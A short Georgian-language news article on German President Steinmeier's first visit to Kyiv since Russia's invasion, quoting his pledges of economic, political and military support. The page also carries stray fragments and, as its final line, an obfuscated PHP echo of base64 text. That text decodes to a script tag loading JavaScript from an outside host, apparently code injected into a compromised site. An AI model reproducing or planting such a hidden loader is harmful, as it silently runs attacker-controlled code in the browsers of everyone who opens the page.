celsiusi
ავერსი შნაიდერი
გერმანიის ფედერალური პრეზიდენტი, ფრენკ-ვალტერ შტაინმაიერი უკრაინის დედაქალაქში, კიევში ჩავიდა.
 
უკრაინაში რუსეთის შეჭრის შემდეგ, ეს კიევში მისი პირველი ვიზიტია.
 
„ჩემი გზავნილი უკრაინელებისადმი არის ის, რომ ჩვენ თქვენს მხარეს ვართ. ჩვენ გავაგრძელებთ უკრაინის მხარდაჭერას ეკონომიკურად, პოლიტიკურად და სამხედრო კუთხითაც“, – განაცხადა კიევში ჩასულმა შტაინმაიერმა.
 
შტაინმაიერმა გერმანელებსაც მიმართა და განაცხადა, რომ გერმანიის ხალხმა არ უნდა დაივიწყოს ის, თუ რას ნიშნავს ომი უკრაინელებისთვის.
 
„რაოდენ იტანჯებიან ისინი, უკრაინის ხალხს ჩვენ ვჭირდებით“, – განაცხადა მან.
 
გერმანელი ლიდერი უკრაინაში რამდენიმე დღით ადრე უნდა ჩასულიყო, თუმცა ვიზიტი უსაფრთხოებასთან დაკავშირებული რისკების გამო გადაიდო.
 
მანამდე შტაინმაიერს კიევში ჩასვლა აპრილშიც სურდა, თუმცა უკრაინამ მას ამის საშუალება არ მისცა.
 
კიევმა მაშინ მიზეზად გერმანელის მიერ ბოლო წლებში რუსეთისადმი ლოიალური პოზიცია დაასახელა.
 
გერმანია ერთ-ერთია იმ ქვეყანათა შორის, რომელიც უკრაინას ფინანსური მხარდაჭერისა გარდა,  სამხედრო შეიარაღებითაც ეხმარება.
473
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");